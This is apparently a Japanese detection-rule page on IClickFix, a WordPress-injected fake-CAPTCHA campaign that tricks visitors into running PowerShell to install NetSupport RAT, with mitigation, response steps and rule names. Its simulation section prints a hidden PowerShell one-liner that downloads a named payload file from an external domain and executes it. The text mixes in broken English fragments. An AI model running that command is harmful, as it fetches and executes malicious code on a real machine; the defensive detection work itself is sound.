IClickFixを紹介:ClickFix戦略を使用する広範なWordPressターゲティングフレームワーク
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートは、以下に焦点を当てています IClickFix、WordPressサイトを侵害し、Cloudflareのターンスタイル風CAPTCHAを偽装する悪意のあるJavaScriptフレームワークです。この罠は、訪問者にPowerShellコマンドを実行させ、 NetSupport RATをダウンロードしてインストールさせます。配信は、 YOURLS のURL短縮ツールとリダイレクタードメインの回転セットを中心に構築されたトラフィック配信システムを使用してサポートされます。研究者は2024年後半以来、世界中の3,800以上のWordPressサイトがこのチェーンを提供しているのを観察しました。 3,800 compromised WordPress sites serving this chain globally since late 2024.
調査
Sekoiaの分析者は、侵害されたサイトで注入されたJavaScriptタグを特定し、次に短期間の複数のドメインを通じてリダイレクトフローを再構築しました。彼らは最終的なペイロードを取得するために使用された正確なPowerShell実行パターンを捕捉し、ドロップされたNetSupport RATコンポーネントを関連付けられたC2インフラストラクチャの指標と共に回収しました。 ic-tracker-js on compromised sites, then reconstructed the redirect flow across multiple short-lived domains. They captured the exact PowerShell execution pattern used to retrieve the final payload and recovered the dropped NetSupport RAT components along with associated C2 infrastructure indicators.
緩和策
Webコンテンツの注入を監視し、チェーンで使用される既知の悪意のあるドメイン、リダイレクター、ショートリンクサービスをブロックします。エンドポイントでは、ClickFixルアーと一貫したPowerShellのダウンロードおよび実行パターンを検出します。NetSupportクライアントファイル作成のカバー範囲と、ユーザーレベルのレジストリキーを介した持続性のカバー範囲を追加します。 ic-tracker-js injection and block known malicious domains, redirectors, and short-link services used in the chain. On endpoints, detect PowerShell download-and-execute patterns consistent with the ClickFix lure. Add coverage for NetSupport client file creation and for persistence via user-level Run registry keys.
対応
指標が現れた場合、エンドポイントを隔離し、アクティブなPowerShellプロセスを停止し、NetSupportバイナリとレジストリベースの持続性を削除します。攻撃者が追加のインプラントを展開したり、セキュンドリ・アクセスを確立したりしていないことを確認するために、完全なフォレンジックトライアージを実施します。
攻撃フロー
検出
PowerShell経由のダウンロードまたはアップロード(cmdline経由)
表示
公共のユーザープロファイルでの疑わしいファイル(file_event経由)
表示
隠されたPowerShellコマンドラインによる実行の可能性(cmdline経由)
表示
Invoke-RestMethodの疑わしい使用(powershell経由)
表示
疑わしいディレクトリからのNetSupport Managerバイナリ実行の試み(process_creation経由)
表示
持続性の可能性のあるポイント[ASEPs – Software/NTUSER Hive](registry_event経由)
表示
IOC (HashSha256)を検出する: IClickFixを満たす: ClickFix戦術を使用する広範囲なWordPressターゲティングフレームワーク
表示
IOC (DestinationIP)を検出する: IClickFixを満たす: ClickFix戦術を使用する広範囲なWordPressターゲティングフレームワーク
表示
IOC (SourceIP)を検出する: IClickFixを満たす: ClickFix戦術を使用する広範囲なWordPressターゲティングフレームワーク
表示
IClickFix悪意のあるJavaScriptインジェクション検出[Webserver]
表示
NetSupport RAT配布のためのPowerShellコマンド実行[Windows Powershell]
表示
シミュレーション実行
前提条件: テレメトリおよびベースラインの事前チェックが通過している必要があります。
-
攻撃の流れとコマンド:
エンドポイントへの初期アクセスを持つ攻撃者が、NetSupport RATを配布し続けることによって永続的な足場を確立しようとします。対話的な検出を回避するために、彼らはプロファイルやロゴを使用せずに非表示モードでPowerShellを起動します(
-w hidden -nop -c)。次にInvoke‑WebRequest(iwr)を使用して、悪意のあるJSONペイロード(tytuy.json)をダウンロードし、その中にはRAT用のPowerShellスクリプトが含まれています。このスクリプトは一時ディレクトリに書き込まれ、Invoke‑Expressionによって実行されます。この正確なコマンドラインは、Sigmaルールが監視している文字列に一致します。Invoke‑Expression. This exact command line matches the strings the Sigma rule monitors. -
回帰テストスクリプト:
# 検出ルールに一致するPowerShellのワンライナー $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
クリーンアップコマンド:
# ダウンロードされたペイロードを削除し、残っているPowerShellプロセスをすべて削除します Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force